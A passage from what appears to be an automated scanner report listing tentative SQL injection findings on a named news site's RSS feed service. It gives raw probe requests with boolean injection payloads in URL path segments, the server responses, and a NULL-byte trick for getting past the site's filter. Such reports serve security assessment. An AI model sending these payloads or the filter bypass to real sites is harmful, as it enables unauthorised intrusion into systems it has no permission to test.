and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200738.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.10. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200742.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200742.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:04 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.11. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200742.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200742.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 15112565%20or%201%3d1--%20 and 15112565%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56815112565%20or%201%3d1--%20/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/56815112565%20or%201%3d2--%20/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.12. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200743.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200743.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200743.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:01 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200743.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.13. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200744.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200744.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 62668673%20or%201%3d1--%20 and 62668673%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56862668673%20or%201%3d1--%20/200744.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/56862668673%20or%201%3d2--%20/200744.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.14. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200746.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200746.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:18:57 GMT
Date: Tue, 07 Dec 2010 23:18:57 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.15. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200746.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200746.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 23993338%20or%201%3d1--%20 and 23993338%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56823993338%20or%201%3d1--%20/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/56823993338%20or%201%3d2--%20/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.16. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200747.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200747.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 18638958%20or%201%3d1--%20 and 18638958%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56818638958%20or%201%3d1--%20/200747.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/56818638958%20or%201%3d2--%20/200747.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.17. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200747.xml [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200747.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568/200747.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:12 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200747.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:12 GMT
Content-Length: 12372
Connection: close
Set-Cookie: JSESSIONID=EDZ5AFGTMHV4ACUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.18. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200748.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:19 GMT
Date: Tue, 07 Dec 2010 23:19:19 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.19. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200748.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:29 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.20. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200748.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568/200748.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:33 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200748.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:34 GMT
Content-Length: 22692
Connection: close
Set-Cookie: JSESSIONID=GL5CPID3GOAV2CUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.21. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200749.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200749.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200749.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200749.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Date: Tue, 07 Dec 2010 23:19:12 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.22. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200749.xml [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200749.xml

Issue detail

Remediation detail

Request 1

